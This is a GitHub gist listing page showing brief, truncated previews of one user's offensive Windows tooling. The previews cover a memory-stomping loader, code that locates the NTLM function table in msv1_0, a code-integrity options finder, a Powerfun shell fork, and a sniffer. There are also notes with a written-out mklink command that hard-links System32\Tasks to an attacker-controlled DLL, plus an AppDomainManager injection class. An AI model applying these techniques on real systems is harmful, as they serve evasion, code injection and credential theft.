Skip to content

Instantly share code, notes, and snippets.

View LOADER_SNIPPET_STOMP.c
MapImg = MemAllocateStomped( &fTable, ImgLen );
if ( !MapImg ) {
sParam.ImgMod = TRUE;
MapImg = MemAllocateVirtual( &fTable, ImgLen );
};
InlineZeroMemory( MapImg, ImgLen );
SecHdr = IMAGE_FIRST_SECTION( NtsHdr );
for ( INT i = 0 ; i < NtsHdr->FileHeader.NumberOfSections ; ++i ) {
@realoriginal
realoriginal / dllmain.c
Last active Mar 6, 2020
Locate msv1_0!NtlmFunctionTable by parsing .rdata section.
View dllmain.c
#define _GNU_SOURCE
#define _WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <string.h>
#include <stdio.h>
#include "ssp.h"
BOOL
DllMain( _In_ HINSTANCE hInstance,
_In_ DWORD fdwReason,
@realoriginal
realoriginal / .clang-format
Created Feb 24, 2020 — forked from jtippet/.clang-format
clang-format file to approximate Windows NT coding style for C++ drivers
View .clang-format
AccessModifierOffset: -4
AlignAfterOpenBracket: AlwaysBreak
AlignConsecutiveAssignments: false
AlignConsecutiveDeclarations: false
AlignEscapedNewlines: DontAlign
AlignOperands: true
AllowAllParametersOfDeclarationOnNextLine: false
AllowShortBlocksOnASingleLine: false
AllowShortCaseLabelsOnASingleLine: false
AllowShortFunctionsOnASingleLine: Inline
View ci.c
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#define PTR(x) ((ULONG_PTR)x)
LPVOID GetCiOptions1(LPVOID ImageBase)
{
HANDLE hCiLib;
LPVOID fCiInit;
View powerfun-fork.ps1
# Powerfun - Written by Ben Turner & Dave Hardy
# Forked for a few quick fixes.
function Get-Webclient
{
$wc = New-Object -TypeName Net.WebClient
$wc.UseDefaultCredentials = $true
$wc.Proxy.Credentials = $wc.Credentials
$wc
}
View BUILDING_DROPBOX_PT1.md

HomeLab : Building a Alpine-Based (AARCH64) DropBox (pt 1)

I've been fascinated for a while on the idea of building my own home network, however with little time and somewhat being stubborn on the specifics I've pushed it off until most of the pieces come to together. Nonetheless, I plan on documenting as much of the process as possible in hopes to keep a "log", as well as hopefully teach others as I learn. Probably impossible to teach something you know so little about, but you miss the shots you don't take, as they say.

Purpose of this bit is to construct an Alpine Linux-based dropbox running atop an SBC (Single-Board-Computer) to allow internal access into the network from anywhere (well, the ones I permit anyhow). For this, I've chosen:

View sniff.c
/*!
* spy.c
*
* I just wanna feel like I'm still living.
* - Eden "Rock & Roll"
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include "spy.h"
@realoriginal
realoriginal / Update_Notes.md
Created Aug 8, 2019
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property
View Update_Notes.md

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

View Tasks.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
View tasks.cs
This file has been truncated, but you can view the full file.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;